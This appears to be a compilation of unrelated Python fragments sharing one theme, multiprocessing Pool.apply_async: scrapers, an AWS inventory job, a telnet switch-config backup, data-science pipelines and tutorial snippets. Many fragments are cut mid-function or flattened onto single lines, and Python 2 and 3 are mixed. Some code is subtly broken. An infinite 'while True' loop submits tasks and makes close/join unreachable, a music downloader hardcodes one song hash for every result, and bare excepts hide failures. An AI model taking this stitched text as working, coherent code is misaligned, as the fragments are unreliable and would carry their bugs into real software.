def main(): ''' main method ''' if len(sys.argv) < 2: usage() config_uri = sys.argv[1] options = parse_vars(sys.argv[2:]) setup_logging(config_uri) global log log = logging.getLogger(__name__) global settings settings = get_appsettings(config_uri, options=options) engine = engine_from_config(settings, 'sqlalchemy.') DBSession.configure(bind=engine) global creds_file creds_file = settings['creds.dir'] + "/creds.yaml" # global to enable us to handle KeyboardInterrupts without leaving zombies # around. global pool pool = Pool(processes=cpu_count() * 2) objects = [] pids = [] for account in get_accounts(): access_key, secret_key = get_creds(account) regions = boto.ec2.regions() for region in regions: # skip restricted access regions if region.name in ['us-gov-west-1', 'cn-north-1']: continue log.debug('checking %s: %s', account, region.name) ec2 = boto.ec2.connect_to_region(region.name, aws_access_key_id=access_key, aws_secret_access_key=secret_key) run1 = pool.apply_async(update_instance_inventory, (ec2, account), callback=objects.extend) run2 = pool.apply_async(update_reservation_inventory, (ec2, account), callback=objects.extend) pids.append(run1) pids.append(run2) # get the output of all our processes for pid in pids: pid.get() del pids[:] # ensure the sqlalchemy objects aren't garbage-collected before we commit # them. # see: http://docs.sqlalchemy.org/en/latest/orm/session_state_management.html#session-referencing-behavior merged = [] for col, kwargs, defaults in objects: obj = insert_or_update(DBSession, col, defaults=defaults, **kwargs) merged.append(DBSession.merge(obj)) try: transaction.commit() except IntegrityError as exc: DBSession.rollback() log.error(exc) pool.close() pool.join() expire_instances() #TODO: enable passing in threshold value prune_instances() prune_reservations()
        newMysqlConn = mysqlConn('bilibili')
        resultFlag = newMysqlConn.insert('insert into user_copy1 (id,name,sex,face,sign,level,birthday,coins,following,follower) values (%s, %s,%s,%s,%s,%s,%s,%s,%s,%s)',
                                         [userData['id'], userData['name'], userData['sex'], userData['face'],
                                          userData['sign'], userData['level'], userData['birthday'],
                                          userData['coins'], userData['following'], userData['follower']])
    except:
        pass

if __name__ == '__main__':
    # The parent process creates a Queue and passes it to each child process:
    # q = Queue()
    # pw = Process(target=write, args=(q,))
    # # pr = Process(target=read, args=(q,))
    # # Start child process pw (writer):
    # print(time.ctime(time.time()))
    # pw.start()
    # # Start child process pr (reader):
    # # pr.start()
    # # Wait for pw to finish:
    # pw.join()
    # print(time.ctime(time.time()))
    # # pr runs an infinite loop and cannot be waited on; it has to be terminated:
    # pr.terminate()

    p = Pool(12)
    print(time.ctime(time.time()))
    i = 1
    while True:
        p.apply_async(write, args=(i,))
        i = i + 1
    p.close()
    p.join()
    print(time.ctime(time.time()))
if __name__ == "__main__": # %% manager = mp.Manager() aggreateData = manager.dict() start = time.time() day_second = 86400 # week_second = 7*day_second start_list = np.arange(1162393768, 1178747998 + day_second, day_second) epoch_length = 30 # start_list = start_list[:3] output = open('dict_list3_1.pkl', 'wb') # %% results = [] p = Pool(16) for start_point in start_list: # print('assign\t',str(start_point)) result = p.apply_async(func=compute, args=(start_point, )) results.append(result) p.close() p.join() output_list = [] for result in results: output_list.append(result.get()) print('compute_time:', time.time() - start) pickle.dump(output_list, output) output.close()
    # Log out of the telnet session
    def logout_host(self):
        self.tn.write(b"quit\n")

# Run the backup on one switch
def switchbak(i, u, p, c):
    telnet_client = TelnetClient()
    if telnet_client.login_host(i, u, p):
        telnet_client.execute_some_command(c)
    telnet_client.logout_host()

if __name__ == '__main__':
    print('Starting concurrent multi-process backup')
    start = time.time()
    # 50 is the number of processes; adjust it to the client and server configuration.
    # Note: too many processes may be flagged as a malicious attack by security software.
    p = Pool(50)
    for ip in open('switchs.txt').readlines():
        ip = ip.strip()
        # telnet user on the switch that has the backup command
        username = '******'
        # password of that user
        password = '******'
        # tftp server address
        ftphost = 'TFTP IP'
        filename = ip.replace('.', '.') + '-' + datetime.date.today().strftime('%Y%m%d') + '.cfg'
        command1 = 'backup startup-configuration to ' + (ftphost) + ' ' + filename
        p.apply_async(switchbak, args=(ip, username, password, command1))
    p.close()
    p.join()
    end = time.time()
    print('Backup finished, elapsed: %0.2f seconds' % (end - start))
def write_to_database(name, content):
    ''' Insert one parsed job record into the database. '''
    conn = sqlite3.connect(name)
    cursor = conn.cursor()
    cursor.execute('INSERT INTO job (company,salary,require,company_benefits,feature,industry) VALUES (?,?,?,?,?,?)',
                   (content['company'], content['salary'], content['require'],
                    content['Company benefits'], content['feature'], content['industry']))
    cursor.close()
    conn.commit()
    conn.close()

def main(i):
    url = "https://www.lagou.com/zhaopin/Python/" + str(i) + "/"
    html = get_html(url)
    for item in parse(html):
        write_to_database('job.db', item)
    time.sleep(60)
    print('page %s done.' % url)

if __name__ == "__main__":
    init_database('job.db')
    p = Pool()
    for i in range(1, 31):
        p.apply_async(main, args=(i,))
    p.close()
    p.join()
    print('Done')
def run(self, cut_date, percent, run_num=100):
    pool = Pool(28)
    for i in range(run_num):
        pool.apply_async(self.train_fun, args=(cut_date, percent))
    pool.close()
    pool.join()
def main(): os.chdir("../data/structure_11660/") files = glob.glob("*.cif") print(len(files)) print(type(files)) # structure = cif_structure(files[0]) # gen_3d_Plot(structure) # x_min= x_max=y_min=y_max=z_min= z_max = 0 # x_min,x_max,y_min,y_max,z_min, z_max = min_max_dataset(files) # print(x_min,x_max,y_min,y_max,z_min, z_max) # structure = cif_structure(files[10]) # distance_matrix = structure.distance_matrix # print(files[0]) # print(distance_matrix.shape) # graph = nx.from_numpy_matrix(distance_matrix) # nx.draw(graph) # plt.show() # total_unique_species = set() # file_write = open("sizes.dat","w") elements = {} reference_set = set() reference_set.add("H") reference_set.add("N") reference_set.add("C") reference_set.add("O") reference_set.add("Co") reference_set.add("P") reference_set.add("Zn") reference_set.add("Ag") reference_set.add("Cd") reference_set.add("Cu") reference_set.add("Fe") Num_Processes = 20 num_files = len(files) file_chunks = [ files[int((num_files / Num_Processes) * i):int((num_files / Num_Processes * (i + 1)))] for i in range(Num_Processes) ] for each in file_chunks: print(each) pool = Pool(processes=Num_Processes) results = [ pool.apply_async(func, args=(file_chunks[i], )) for i in range(Num_Processes) ] output = [p.get() for p in results] log = open("files.log", "w") for returned_list in output: for each in returned_list: log.write(each) log.write("\n") log.close()
    DPC(path + 'R15.dat', 'R15', 15, plot=axes[2][1])
    DPC(path + 'D31.dat', 'D31', 31, plot=axes[3][0])
    DPC(path + 'jain.dat', 'jain', 2, plot=axes[3][1])
    DPC(path + 'pathbased.dat', 'pathbased', 3, dc_percent=4, plot=axes[4][0])
    DPC(path + 'compound.dat', 'compound', 5, dc_percent=4, plot=axes[4][1])
    plt.show()

if __name__ == '__main__':
    # Plot the results for all datasets
    # draw_all_cluster()
    # Plot the details for the selected datasets
    p = Pool(4)
    path = sys.path[0] + '/dataset/'
    # path | title | N: number of clusters | dc method | dc percent | rho method | delta method | use_halo | plot
    p.apply_async(cluster, args=(path + 'origin_1000.dat', 'origin-1000', 5, 0, 2, 1, 1, True))
    # p.apply_async(cluster, args=(path + 'origin_4000.dat', 'origin-4000', 5, 0, 2, 1, 1, True))
    # p.apply_async(cluster, args=(path + 'flame.dat', 'flame', 2, 0, 3, 1, 1, True))
    # p.apply_async(cluster, args=(path + 'spiral.dat', 'spiral', 3, 0, 2))
    # p.apply_async(cluster, args=(path + 'aggregation.dat', 'aggregation', 7, 0, 3))
    # p.apply_async(cluster, args=(path + 'R15.dat', 'R15', 15))
    # p.apply_async(cluster, args=(path + 'D31.dat', 'D31', 31))
    # p.apply_async(cluster, args=(path + 'jain.dat', 'jain', 2))
    # p.apply_async(cluster, args=(path + 'pathbased.dat', 'pathbased', 3, 0, 4))
    # p.apply_async(cluster, args=(path + 'compound.dat', 'compound', 5, 0, 4))
    p.close()
    p.join()
# if __name__ == '__main__':
#     print('Parent process %s.' % os.getpid())
#     p = Process(target=run_proc, args=('test',))
#     print('Child process will start.')
#     p.start()
#     p.join()
#     print('Child process end')

from multiprocessing import Pool
import os, time, random

def long_time_task(name):
    print('Run task %s (%s)...' % (name, os.getpid()))
    start = time.time()
    time.sleep(random.random() * 3)
    end = time.time()
    print('Task %s runs %0.2f seconds.' % (name, (end - start)))

if __name__ == '__main__':
    print('Parent process %s' % os.getpid())
    p = Pool(4)
    for i in range(5):
        p.apply_async(long_time_task, args=(i,))
    print('Waiting for all subprocesses done...')
    p.close()
    p.join()
    print('All subprocesses done.')  # watch the child processes finish
import json
import requests
import urllib.request
from multiprocessing import Pool

def start_pool(filename, download_url):
    urllib.request.urlretrieve(download_url, 'F:\\music\\' + filename + '.mp3')

if __name__ == '__main__':
    name = input('Welcome to the music download system, please enter the music you want to download: ')
    # search for the song
    filePath = 'http://songsearch.kugou.com/song_search_v2?keyword=%s&page=1&pagesize=30'
    text = requests.get(filePath % name).text
    jsobj = json.loads(text)
    list = jsobj['data']['lists']
    for i in list:
        filename = i['FileName']  # song name
        filehash = i['FileHash']  # song hash
        print(u'Found music %s' % filename)
        url = 'http://www.kugou.com/yy/index.php?r=play/getdata&hash=2688ADB1CA449448388270987BDCE6E8&album_id=960327'
        page = requests.get(url).text
        page_json = json.loads(page)
        down_url = page_json['data']['play_url']
        pool = Pool(processes=4)
        print(u'Downloading music: [%s]' % filename)
        print(u'Music download url: ', down_url)
        pool.apply_async(start_pool, (filename, down_url))
        pool.close()
        pool.join()
def pos_sum_c(main_model, data, time_para, result_file_name, pot_in_num, leve_ratio_num, sp_in, ic_num, fit_ratio): time_para_dict = dict() time_para_dict['time_para_1'] = [ pd.to_datetime('20110101'), pd.to_datetime('20150101'), pd.to_datetime('20150701') ] time_para_dict['time_para_2'] = [ pd.to_datetime('20120101'), pd.to_datetime('20160101'), pd.to_datetime('20160701') ] time_para_dict['time_para_3'] = [ pd.to_datetime('20130601'), pd.to_datetime('20170601'), pd.to_datetime('20171201') ] time_para_dict['time_para_4'] = [ pd.to_datetime('20140601'), pd.to_datetime('20180601'), pd.to_datetime('20181001') ] time_para_dict['time_para_5'] = [ pd.to_datetime('20140701'), pd.to_datetime('20180701'), pd.to_datetime('20181001') ] time_para_dict['time_para_6'] = [ pd.to_datetime('20140801'), pd.to_datetime('20180801'), pd.to_datetime('20181001') ] data_n = data[data['time_para'] == time_para] begin_date, cut_date, end_date = time_para_dict[time_para] a_n = data_n[(data_n['ic'].abs() > ic_num) & (data_n['pot_in'].abs() > pot_in_num) & (data_n['leve_ratio'].abs() > leve_ratio_num) & (data_n['sp_in'].abs() > sp_in) & (data_n['fit_ratio'].abs() > fit_ratio) & (data_n['sp_in'] * data_n['sp_out_4'] > 0)] sum_factor_df = pd.DataFrame() pnl_save_path = '/mnt/mfs/dat_whs/data/mix_factor_pnl/' + result_file_name bt.AZ_Path_create(pnl_save_path) result_list = [] pool = Pool(20) for i in a_n.index: # bkt_fun(main_model, pnl_save_path, a_n, i,) result_list.append( pool.apply_async(bkt_fun, args=( main_model, pnl_save_path, a_n, i, ))) pool.close() pool.join() for res in result_list: sum_factor_df = sum_factor_df.add(res.get(), fill_value=0) sum_pos_df = main_model.deal_mix_factor(sum_factor_df).shift(2) in_condition, out_condition, ic, sharpe_q_in_df_u, sharpe_q_in_df_m, sharpe_q_in_df_d, pot_in, \ fit_ratio, leve_ratio, sp_in, sharpe_q_out, pnl_df = filter_all(cut_date, sum_pos_df, main_model.return_choose, if_return_pnl=True, if_only_long=False) print(in_condition, out_condition, ic, sharpe_q_in_df_u, sharpe_q_in_df_m, sharpe_q_in_df_d, pot_in, fit_ratio, leve_ratio, sp_in, sharpe_q_out) # plot_send_result(pnl_df, bt.AZ_Sharpe_y(pnl_df), 'mix_factor') return sum_pos_df, pnl_df
else: annotated_left = max(annotated_left, \ min(np.inf, np.inf, *timestamps[word][csvbase][annotator_key][1])) annotated_right = min(annotated_right, \ max(0, 0, *timestamps[word][csvbase][annotator_key][2])) intervals[human] = interval(*[[x[1],x[2]] for _,x in \ timestamps[word][csvbase][annotator_key].iterrows()]) print('left = ' + str(annotated_left)) print('right = ' + str(annotated_right)) if not use_longest_human_interval: for human in humans: intervals[human] &= interval( [annotated_left, annotated_right]) intervals[pr] &= interval([annotated_left, annotated_right]) if congruence_parallelize != 0: everyone[pr][word][csvbase] = pool.apply_async( doit, (intervals, )) else: everyone[pr][word][csvbase], \ onlyone_tic[pr][word][csvbase], notone_tic[pr][word][csvbase], \ onlyone_word[pr][word][csvbase], notone_word[pr][word][csvbase] = \ doit(intervals) def plot_file(fig, fig_venn, only_data, not_data): ax = fig.add_subplot(nrows, ncols, iplot) if len(sorted_hm) < 4: ax_venn = fig_venn.add_subplot(nrows, ncols, iplot) ax_venn.set_title(os.path.basename(csvbase), fontsize=8) xdata = [ 'Everyone', *['only ' + (x if x != pr else 'SongExplorer') for x in sorted_hm]
# Child process 1: puts items into the queue
def write():
    for s in ["A", "B", "C"]:
        q.put(s)

# Child process 2: takes items out of the queue
def read():
    while True:
        try:
            print(q.get(block=False))
            # With apply (blocking) the writer has finished first, so this would not raise:
            # print(q.get(block=True, timeout=1))
        except:
            break

if __name__ == "__main__":
    # Create the queue; inside a process pool you must use Manager().Queue(),
    # not multiprocessing.Queue directly.
    q = Manager().Queue()
    pool = Pool()
    # Submit the tasks; with the blocking apply, the writer runs before the reader
    # pool.apply(func=write)
    pool.apply_async(func=write)  # if you insist on apply_async, combine the read with a timeout
    # pool.apply(func=read)
    pool.apply_async(func=read)
    # Close the pool and wait for the workers
    pool.close()
    pool.join()
def start(name, dir):
    word = name
    dirpath = mkDir(dir)
    urls = buildUrls(word)
    index = 0
    for url in urls:
        print("Requesting:", url)
        html = requests.get(url, timeout=10).content.decode('utf-8')
        imgUrls = resolveImgUrl(html)
        if len(imgUrls) == 0:  # stop when no images are found
            break
        for url in imgUrls:
            if downImg(url, dirpath, str(index) + ".jpg"):
                index += 1
                print(name, ": downloaded %s images" % index)
                if index == MAX:
                    return

if __name__ == '__main__':
    p = Pool(processes=POOLNUM)
    for name, dir in PIC_TYPES.items():
        print(name, dir)
        p.apply_async(start, (name, dir))
    print('Waiting for all subprocesses done...')
    p.close()
    p.join()
    print('All subprocesses done.')
#             pool.apply_async(func=funds.get_fund_data, args=(data['code'].values[num],
#                                                              sdate.strftime('%Y-%m-%d'),
#                                                              edate.strftime('%Y-%m-%d'),))
# global toAnalysis
toAnalysis = pd.DataFrame(columns=funds.colName)
#txt =
Count = int(args.amount) if args.amount is not None else None
for ids, item in enumerate(data['Name'].tolist()[:Count]):
    print('Processing {:s} '.format(item))
    toAnalysis_add = pool.apply_async(func=analysis, args=(data, item, toAnalysis,)).get()
    toAnalysis = toAnalysis.append(toAnalysis_add, ignore_index=True)
    # analysis(data, item, toAnalysis)
    # pool.apply_async(func=analysis, args=(data, item, toAnalysis, ))

#os.chdir('./Analysis')
#for analysis_result in sorted(glob.glob('*.csv')):
#    analysis_db = pd.read_csv(analysis_result, sep='\t')
#    try:
#        analysis_db.drop(columns=['Unnnamed: 0'], inplace=True)
#    finally:
#        toAnalysis = toAnalysis.append(analysis_db, ignore_index=True)
#    print(analysis_result.split('.')[0])
#    os.remove(analysis_result)
def main(args): ''' entry point ''' if len(args) < 1: usage() selected = None if len(args) > 2: selected = args[2] if not os.path.exists(selected): usage() config_uri = args[1] options = parse_vars(args[3:]) settings = get_appsettings(config_uri, options=options) engine = engine_from_config(settings, 'sqlalchemy.') DBSession.configure(bind=engine) setup_logging(config_uri) global log log = logging.getLogger(__name__) global cache_dir cache_dir = settings['cache.dir'] + "/v3stats" # global to enable us to handle KeyboardInterrupts without leaving zombies around. global pool pool = Pool(processes=cpu_count() * 2) if not selected: selected = select_latest() objects = [] pids = [] stats_path = extract_tarbz2(selected) for filename in os.listdir(stats_path + '/stats'): try: run = pool.apply_async(read_stats, (stats_path + '/stats', filename), callback=objects.append) pids.append(run) except Exception as exc: print exc log.debug(exc) raise # get the output of all our processes for pid in pids: pid.get() # ensure the sqlalchemy objects aren't garbage-collected before we commit them. # see: http://docs.sqlalchemy.org/en/latest/orm/session_state_management.html#session-referencing-behavior merged = [] uidlist = {} for uids, arglist in objects: for table, defaults, kwargs in arglist: if table in uidlist.keys(): uidlist[table].update(uids) else: uidlist[table] = uids obj = insert_or_update(DBSession, table, defaults=defaults, **kwargs) merged.append(DBSession.merge(obj)) try: transaction.commit() except IntegrityError as exc: DBSession.rollback() log.error(exc) pool.close() pool.join() for table in uidlist: rgx = re.compile(r'v3stats-(\d{4}-\d{2}-\d{2}).tar.bz2') scandate, = rgx.search(selected).groups() expire(DBSession, table, uidlist[table], scandate) shutil.rmtree(stats_path)
def simulate_observations(event_class, processes=1): """ Simulate observations for event class Parameters ---------- event_class : dict Event class processes : int, optional Number of parallel processes """ # Dump header print('Simulate observations for "%s" event class' % (event_class['name'])) # Get current working directory cwd = os.getcwd() # Set filenames dirname = 'gps/data/%s' % (event_class['name']) obsname = '../../obs/gps_obs_%s_obsdef.xml' % (event_class['name']) modname = '../../models/models_gps.xml' iemname = '../../models/model_iem.xml' # Create directory for data makedirs(dirname) # Step into data directory os.chdir(dirname) # Load observations observations = gammalib.GObservations(obsname) # Load models models = gammalib.GModels(modname) models_iem = gammalib.GModels(iemname) models.extend(models_iem) # Create a pool of processes (need to do this after loading the observations) if processes > 1: pool = Pool(processes=processes) # Loop over all observations for obs in observations: # Define process arguments args = (obs, event_class['name'], models) # Start processes if processes > 1: pool.apply_async(simulate_observation, args) print('Schedule observation "%s" for "%s" event class' % (obs.id(), event_class['name'])) else: simulate_observation(*args) # For testing #if obs.id() == '000002': # break # Wait for all processes to finish if processes > 1: pool.close() pool.join() # Step out of working directory os.chdir(cwd) # Return return
def main(duration, directory, delay, stage=None, bCheckAlignment=False, n_tubes=1): # Initialize stage if not stage: stage = initialize_stage(x_only=(n_tubes == 1)) # Check alignment if requested if bCheckAlignment: click.pause(info='ALIGNMENT - Align stage to the back left corner and press any key to continue...') check_alignment(stage, x_only=(n_tubes == 1)) # Start imaging loop x0 = stage.posX y0 = stage.posY n_img_per_tube = CAPILLARY_LENGTH // CAPILLARY_X_INTERVAL click.pause("READY - Press any key to start...") t_end = int(time() + duration * 3600) # t_end in unix seconds t_int = int(time()) seq_nb = 0 # Sequence number # Create a pool of 1 worker pool = Pool(processes=1) async_work = None with tqdm(desc='Time', position=0, leave=True, total=int(t_end-t_int), disable=(duration == -1 or logging.getLogger().getEffectiveLevel() == logging.DEBUG)) as bar_time: while (time() < t_end) or (duration == -1): with tqdm(total=n_tubes*n_img_per_tube, desc="Run #{}".format(seq_nb), position=1, leave=False, disable=logging.getLogger().getEffectiveLevel() == logging.DEBUG) as bar_run: for i in range(n_tubes): for j in range(n_img_per_tube): sleep(delay) # Wait for previous camera download to finish, if any if async_work: logging.debug('main - Waiting for camera transfer to finish...') async_work.get(timeout=10) # Capture and save a new image filename = os.path.join(directory, datetime.datetime.now().strftime("%y%m%d_%H%M%S") + '_x{}_y{}_seq{}_CrystKinetics.jpg'.format(j, i, seq_nb)) logging.debug('main - Starting camera worker') async_work = pool.apply_async(camera_full, (filename,)) # Wait until capture is done sleep(delay) # Goto next imaging position direction = -1 if i % 2 == 0 else 1 stage.moveX(direction * CAPILLARY_X_INTERVAL) sleep(1) # Update progress bars bar_run.update(1) t_now = int(time()) bar_time.update(t_now-t_int) t_int = t_now if i < n_tubes-1: stage.moveY(CAPILLARY_Y_INTERVAL) stage.goto(x0, y0) seq_nb += 1 logging.info("Capture done.")
from multiprocessing import Pool
from time import sleep, ctime

# worker function
def worker(msg):
    sleep(2)
    print(msg)
    return msg + 'over'

# create a pool that holds 4 processes
pool = Pool(processes=4)  # can also be written as Pool(4)
result = []
for i in range(10):
    msg = 'hello %d' % i
    # submit the task to the pool
    r = pool.apply_async(func=worker, args=(msg,))
    # pool.apply(func=worker, args=(msg,))
    # keep the returned AsyncResult object
    result.append(r)
# close the pool
pool.close()
# wait for the pool to finish
pool.join()

for i in result:
    print(i.get())
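# NOTE (added example, not part of the original snippet): a minimal sketch, assuming only the
# standard library, of the other thing AsyncResult.get() does for you in the loop above: if the
# worker raised, get() re-raises that exception in the parent, so collecting results is also
# where worker errors surface. The risky() helper below is hypothetical.
from multiprocessing import Pool

def risky(n):
    if n == 2:
        raise ValueError('bad input: %d' % n)
    return n * 10

if __name__ == '__main__':
    with Pool(2) as pool:
        async_results = [pool.apply_async(risky, (n,)) for n in range(4)]
        for r in async_results:
            try:
                print(r.get())
            except ValueError as exc:
                print('worker failed:', exc)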
        if response:
            print(proxy['http'])
    except:
        pass

if __name__ == '__main__':
    # test_ip()
    proxy = getProxy()
    # IPPool1 = []
    # time1 = time.time()
    # for item in proxy:
    #     IPPool1.append(test(item))
    # time2 = time.time()
    # print('singleprocess needs ' + str(time2 - time1) + ' s')
    pool = Pool()
    IPPool2 = []
    temp = []
    time3 = time.time()
    for item in proxy:
        temp.append(pool.apply_async(test, args=(item,)))
    pool.close()
    pool.join()
    for item in temp:
        IPPool2.append(item.get())
    time4 = time.time()
    print('multiprocess needs ' + str(time4 - time3) + ' s')
    get_real_ip_pool()
    # '176.235.11.6:8080','176.9.28.86:1080','5.189.135.164:3128','64.33.171.19:8080','166.111.131.52:3128','51.15.196.77:8888','93.94.223.18:8080','123.125.159.122:80','50.205.154.101:3128','118.114.77.47:8080'
# -*-coding:utf8-*-
from multiprocessing import Pool
import os, time, random

def long_time_task(name):
    print('Run task %s (%s)...' % (name, os.getpid()))
    start = time.time()
    time.sleep(random.random() * 3)
    end = time.time()
    print('Task %s runs %0.2f seconds.' % (name, (end - start)))

if __name__ == '__main__':
    print('Parent process %s.' % os.getpid())
    # To start a large number of child processes, create them in batches with a process pool.
    # Here the pool runs at most 4 processes at the same time.
    # The default Pool size is the number of CPU cores, so on an 8-core CPU you would have to
    # submit at least 9 child processes to see any of them wait.
    p = Pool(4)
    for i in range(5):
        p.apply_async(long_time_task, args=(i,))  # the function arguments are passed as a tuple
    print('Waiting for all subprocesses done...')
    p.close()  # after close() no new processes can be added
    p.join()   # wait for all child processes to finish; close() must be called first
    print('All subprocesses done.')
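# NOTE (added example, not part of the original snippet): the comments above say the default
# Pool size equals the number of CPU cores. A minimal sketch, assuming only the standard
# library, that makes this visible by submitting one task more than there are cores; the
# spin() helper is hypothetical.
from multiprocessing import Pool, cpu_count
import os, time

def spin(n):
    time.sleep(1)
    return (n, os.getpid())

if __name__ == '__main__':
    print('cpu_count() =', cpu_count())  # default number of pool workers
    with Pool() as p:                    # Pool() with no argument uses cpu_count() workers
        jobs = [p.apply_async(spin, (i,)) for i in range(cpu_count() + 1)]
        print([j.get() for j in jobs])   # the extra task has to wait for a free worker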
    if not os.path.exists('addsv_logs_' + os.path.basename(args.outBamFile)):
        os.mkdir('addsv_logs_' + os.path.basename(args.outBamFile))
        print "INFO\t" + now() + "\tcreated log directory: addsv_logs_" + os.path.basename(args.outBamFile)

    with open(args.varFileName, 'r') as varfile:
        for bedline in varfile:
            if re.search('^#', bedline):
                continue
            if args.maxmuts and nmuts >= int(args.maxmuts):
                break
            # submit each mutation as its own thread
            result = pool.apply_async(makemut, [args, bedline])
            results.append(result)
            nmuts += 1
            if args.delay is not None:
                sleep(int(args.delay))

    ## process the results of multithreaded mutation jobs
    for result in results:
        tmpbam = None
        exclfn = None
        tmpbam, exclfn = result.get()
        if tmpbam is not None and exclfn is not None:
            tmpbams.append(tmpbam)
import time
from multiprocessing import Pool

"""
apply: call a function, passing arbitrary arguments
map: map a function over every element of an iterable
"""

def test(x, y, z=0):
    """A script step that would take 30 minutes to run."""
    print('~~~~')
    time.sleep(2)
    return x + y

if __name__ == '__main__':
    pool = Pool(2)
    # apply(self, func, args=(), kwds={})
    # apply(self, func, *args, **kwds)
    result = pool.apply(test, (2, 3), {'z': 1})  # blocks the main program (main process), synchronous
    pool.apply_async(test, (2, 3))  # does not block the main program, asynchronous
    print("finished!")
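# NOTE (added example, not part of the original snippet): the docstring above also mentions
# map, which this snippet never exercises. A minimal, self-contained sketch of Pool.map: it
# applies one single-argument function to every item of an iterable, blocks until all workers
# are done, and returns the results in order. The square() helper is hypothetical.
from multiprocessing import Pool

def square(x):
    return x * x

if __name__ == '__main__':
    with Pool(2) as pool:
        print(pool.map(square, [1, 2, 3, 4]))  # -> [1, 4, 9, 16]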
if __name__ == "__main__": # Format: ['month','day'] dates_to_add = [ ["10", "23"], ["10", "25"], ["10", "27"], ] for month in xrange(3, 12 + 1): for day in xrange(1, 31 + 1): a = str(day).zfill(2) m = str(month).zfill(2) dates_to_add.append([m, a]) print dates_to_add from multiprocessing import Pool, TimeoutError pool = Pool(processes=8) for d in dates_to_add: fileName = "bptx_mon_timing_2016_" + d[0] + "_" + d[1] + "_UTC" pool.apply_async(convertToROOT, args=( DATAPATH, fileName, )) # convertToROOT(DATAPATH, fileName) pool.close() pool.join()
                    default=1)
parser.add_argument('--stepsize', dest='step_size', type=float, default=0.01)
parser.add_argument('--visualize', action="store_true", default=False)
# parser.add_argument('--timeout', type=int, help="Number of seconds before individual test run is killed.")
args = parser.parse_args()

pool = Pool(processes=args.pool_size)

# Arguments for the agent and environment
agent_env_args = dict(
    step_size=args.step_size,
    visualize=args.visualize,  # OsimEnv
    print_summary=False,
    test_mode=True)

# launching multiple evaluations asynchronously *may* use more processes
start_time = dt.datetime.now()
test_results = [
    pool.apply_async(run_test, (args.model, agent_env_args, args.action_repeat))
    for i in range(args.run_count)
]
rewards = [res.get() for res in test_results]
mean, min_reward, max_reward = np.mean(rewards), min(rewards), max(rewards)
print("Mean test reward over %d runs in %.1f seconds: %.3f [%.3f, %.3f]" %
      (args.run_count, (dt.datetime.now() - start_time).total_seconds(), mean, min_reward, max_reward))
import sys

# unique_id = sys.argv[1]
unique_id = 'test'
s_time = time.time()
funcUtil.killRunningProcess(unique_id)
funcUtil.recordPid(unique_id)
funcUtil.recordStatus(unique_id, 'Start ...')

p = Pool()
result_list = []
for i in range(process_num):
    result_list.append(p.apply_async(run, args=(i, process_num, unique_id)))
print 'Waiting for all subprocesses done...'
p.close()
p.join()
print 'All subprocesses done.'

result_list = map(lambda x: x.get(), result_list)

def compare_accuracy(a, b):
    record_a = a[1]['test_record']
    record_b = b[1]['test_record']
    mean_accuracy_a = (record_a['Test']['accuracy'] + record_a['Validation']['accuracy']) / 2.0
    mean_accuracy_b = (record_b['Test']['accuracy'] + record_b['Validation']['accuracy']) / 2.0
def main():
    pool = Pool()
    pool.apply_async(notificate)
    pool.apply_async(answer)
        if path not in existingTree:
            total += 1
            total += countMissing(existingTree[path], wantedTree[path])
    return total

def solve(existingTree, wantedTree):
    return countMissing(existingTree, wantedTree)

if __name__ == '__main__':
    inp = open(FILE_NAME_BASE + '.in', 'r')
    numCases = int(inp.readline())
    if NUM_PROCESSES == 0:
        results = [solve(*parse(inp)) for _ in range(numCases)]
    else:
        from multiprocessing import Pool
        pool = Pool(NUM_PROCESSES)
        results = [pool.apply_async(solve, parse(inp)) for _ in range(numCases)]
    inp.close()
    out = open(FILE_NAME_BASE + '.out', 'w')
    for case, result in enumerate(results):
        value = result if NUM_PROCESSES == 0 else result.get()
        out.write('Case #%d: %s\n' % (case + 1, value))
        out.flush()
    out.close()